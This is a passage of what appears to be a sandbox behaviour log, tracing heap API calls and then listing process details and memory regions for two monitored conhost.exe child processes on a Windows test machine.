[0187.320] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926870) returned 1
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926870) returned 0x14
[0187.320] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926870) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49265c8) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49265c8) returned 0x14
[0187.321] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49265c8) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49273e0) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49273e0) returned 0x10
[0187.321] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49273e0) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49265e8) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49265e8) returned 0x14
[0187.321] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49265e8) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4922798) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.321] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4922798) returned 0x14
[0187.321] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4922798) returned 1
[0187.321] GetProcessHeap () returned 0x4920000
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929578) returned 1
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929578) returned 0x14
[0187.322] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929578) returned 1
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49294f8) returned 1
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49294f8) returned 0x14
[0187.322] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49294f8) returned 1
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929358) returned 1
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929358) returned 0x14
[0187.322] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929358) returned 1
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49296b8) returned 1
[0187.322] GetProcessHeap () returned 0x4920000
[0187.322] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49296b8) returned 0x14
[0187.322] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49296b8) returned 1
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927488) returned 1
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927488) returned 0x10
[0187.323] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927488) returned 1
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49227b8) returned 1
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49227b8) returned 0x14
[0187.323] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49227b8) returned 1
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49274b8) returned 1
[0187.323] GetProcessHeap () returned 0x4920000
[0187.323] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49274b8) returned 0x10
[0187.324] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49274b8) returned 1
[0187.324] exit (_Code=0)
Thread:
id = 24
os_tid = 0xba0
Process:
id = "4"
image_name = "conhost.exe"
filename = "c:\\windows\\system32\\conhost.exe"
page_root = "0x55c000"
os_pid = "0x1138"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x1140"
cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
cur_dir = "C:\\Windows"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 594
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 595
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 596
start_va = 0x50000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 597
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 598
start_va = 0x400000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 599
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 600
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 601
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 602
start_va = 0x7ff637930000
end_va = 0x7ff637940fff
monitored = 0
entry_point = 0x7ff6379316b0
region_type = mapped_file
name = "conhost.exe"
filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")
Region:
id = 603
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 604
start_va = 0x600000
end_va = 0x87ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 605
start_va = 0x7ffa15160000
end_va = 0x7ffa1520cfff
monitored = 0
entry_point = 0x7ffa151781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 606
start_va = 0x7ffa13130000
end_va = 0x7ffa13317fff
monitored = 0
entry_point = 0x7ffa1315ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 607
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 608
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 609
start_va = 0x90000
end_va = 0x14dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 610
start_va = 0x7ffa13cc0000
end_va = 0x7ffa13d5cfff
monitored = 0
entry_point = 0x7ffa13cc78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 611
start_va = 0x150000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 612
start_va = 0x190000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 613
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 614
start_va = 0x7ffa0abf0000
end_va = 0x7ffa0ac48fff
monitored = 0
entry_point = 0x7ffa0abffbf0
region_type = mapped_file
name = "conhostv2.dll"
filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")
Region:
id = 615
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 616
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 617
start_va = 0x7ffa14340000
end_va = 0x7ffa145bcfff
monitored = 0
entry_point = 0x7ffa14414970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 618
start_va = 0x7ffa145c0000
end_va = 0x7ffa146dbfff
monitored = 0
entry_point = 0x7ffa146002b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 619
start_va = 0x7ffa13320000
end_va = 0x7ffa13389fff
monitored = 0
entry_point = 0x7ffa13356d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 620
start_va = 0x7ffa13d80000
end_va = 0x7ffa13ed5fff
monitored = 0
entry_point = 0x7ffa13d8a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 621
start_va = 0x7ffa13ee0000
end_va = 0x7ffa14065fff
monitored = 0
entry_point = 0x7ffa13f2ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 622
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 623
start_va = 0x7ffa13b70000
end_va = 0x7ffa13cb2fff
monitored = 0
entry_point = 0x7ffa13b98210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 625
start_va = 0x7ffa14070000
end_va = 0x7ffa140cafff
monitored = 0
entry_point = 0x7ffa140838b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 626
start_va = 0x7ffa141e0000
end_va = 0x7ffa1421afff
monitored = 0
entry_point = 0x7ffa141e12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 627
start_va = 0x7ffa147c0000
end_va = 0x7ffa14880fff
monitored = 0
entry_point = 0x7ffa147e0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 628
start_va = 0x7ffa11220000
end_va = 0x7ffa113a5fff
monitored = 0
entry_point = 0x7ffa1126d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 634
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 635
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 636
start_va = 0x880000
end_va = 0xa07fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000880000"
filename = ""
Region:
id = 637
start_va = 0xa10000
end_va = 0xb90fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a10000"
filename = ""
Region:
id = 638
start_va = 0xba0000
end_va = 0x1f9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ba0000"
filename = ""
Region:
id = 639
start_va = 0x600000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 640
start_va = 0x780000
end_va = 0x87ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000780000"
filename = ""
Region:
id = 646
start_va = 0x600000
end_va = 0x63ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 647
start_va = 0x6c0000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 648
start_va = 0x7ffa15210000
end_va = 0x7ffa1676efff
monitored = 0
entry_point = 0x7ffa153711f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 678
start_va = 0x7ffa13390000
end_va = 0x7ffa133d2fff
monitored = 0
entry_point = 0x7ffa133a4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 679
start_va = 0x7ffa13520000
end_va = 0x7ffa13b63fff
monitored = 0
entry_point = 0x7ffa136e64b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 684
start_va = 0x7ffa15090000
end_va = 0x7ffa15136fff
monitored = 0
entry_point = 0x7ffa150a58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 685
start_va = 0x7ffa14ba0000
end_va = 0x7ffa14bf1fff
monitored = 0
entry_point = 0x7ffa14baf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 693
start_va = 0x7ffa12e10000
end_va = 0x7ffa12e1efff
monitored = 0
entry_point = 0x7ffa12e13210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 694
start_va = 0x7ffa12e80000
end_va = 0x7ffa12f34fff
monitored = 0
entry_point = 0x7ffa12ec22e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 706
start_va = 0x7ffa12dc0000
end_va = 0x7ffa12e0afff
monitored = 0
entry_point = 0x7ffa12dc35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 707
start_va = 0x7ffa12d90000
end_va = 0x7ffa12da3fff
monitored = 0
entry_point = 0x7ffa12d952e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 708
start_va = 0x7ffa11710000
end_va = 0x7ffa117a5fff
monitored = 0
entry_point = 0x7ffa11735570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 711
start_va = 0x50000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 712
start_va = 0x1fa0000
end_va = 0x22d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 720
start_va = 0x22e0000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022e0000"
filename = ""
Region:
id = 721
start_va = 0x23e0000
end_va = 0x25dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023e0000"
filename = ""
Region:
id = 722
start_va = 0x640000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 723
start_va = 0x7ffa14a40000
end_va = 0x7ffa14b99fff
monitored = 0
entry_point = 0x7ffa14a838e0
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 730
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 731
start_va = 0x80000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 732
start_va = 0x25e0000
end_va = 0x269bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000025e0000"
filename = ""
Region:
id = 733
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 734
start_va = 0x7ffa10610000
end_va = 0x7ffa10631fff
monitored = 0
entry_point = 0x7ffa10611a40
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 735
start_va = 0x7ffa11410000
end_va = 0x7ffa11422fff
monitored = 0
entry_point = 0x7ffa11412760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 742
start_va = 0x7ffa12ba0000
end_va = 0x7ffa12bf5fff
monitored = 0
entry_point = 0x7ffa12bb0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 748
start_va = 0x60000
end_va = 0x66fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 749
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 750
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 751
start_va = 0x1f0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 752
start_va = 0x680000
end_va = 0x680fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "conhostv2.dll.mui"
filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")
Region:
id = 753
start_va = 0x690000
end_va = 0x691fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Region:
id = 754
start_va = 0x7ffa080f0000
end_va = 0x7ffa08363fff
monitored = 0
entry_point = 0x7ffa08160400
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")
Region:
id = 755
start_va = 0x6a0000
end_va = 0x6a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 756
start_va = 0x6b0000
end_va = 0x6b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Thread:
id = 15
os_tid = 0x1148
Thread:
id = 16
os_tid = 0x1124
Thread:
id = 17
os_tid = 0x27c
Thread:
id = 21
os_tid = 0x1214
Process:
id = "5"
image_name = "conhost.exe"
filename = "c:\\windows\\system32\\conhost.exe"
page_root = "0x331ea000"
os_pid = "0xba4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x1128"
cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
cur_dir = "C:\\Windows"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 649
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 650
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 651
start_va = 0x50000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 652
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 653
start_va = 0x400000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 654
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 655
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 656
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 657
start_va = 0x7ff637930000
end_va = 0x7ff637940fff
monitored = 0
entry_point = 0x7ff6379316b0
region_type = mapped_file
name = "conhost.exe"
filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")
Region:
id = 658
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 659
start_va = 0x600000
end_va = 0x85ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 660
start_va = 0x7ffa15160000
end_va = 0x7ffa1520cfff
monitored = 0
entry_point = 0x7ffa151781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 661
start_va = 0x7ffa13130000
end_va = 0x7ffa13317fff
monitored = 0
entry_point = 0x7ffa1315ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 662
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 663
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 664
start_va = 0x90000
end_va = 0x14dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 665
start_va = 0x7ffa13cc0000
end_va = 0x7ffa13d5cfff
monitored = 0
entry_point = 0x7ffa13cc78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 666
start_va = 0x150000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 667
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 668
start_va = 0x190000
end_va = 0x196fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 669
start_va = 0x7ffa0abf0000
end_va = 0x7ffa0ac48fff
monitored = 0
entry_point = 0x7ffa0abffbf0
region_type = mapped_file
name = "conhostv2.dll"
filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")
Region:
id = 670
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 671
start_va = 0x7ffa14340000
end_va = 0x7ffa145bcfff
monitored = 0
entry_point = 0x7ffa14414970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 672
start_va = 0x7ffa145c0000
end_va = 0x7ffa146dbfff
monitored = 0
entry_point = 0x7ffa146002b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 673
start_va = 0x7ffa13320000
end_va = 0x7ffa13389fff
monitored = 0
entry_point = 0x7ffa13356d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 674
start_va = 0x7ffa13d80000
end_va = 0x7ffa13ed5fff
monitored = 0
entry_point = 0x7ffa13d8a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 675
start_va = 0x7ffa13ee0000
end_va = 0x7ffa14065fff
monitored = 0
entry_point = 0x7ffa13f2ffc0
region_type = mapped_file
name = "gdi32.dll"
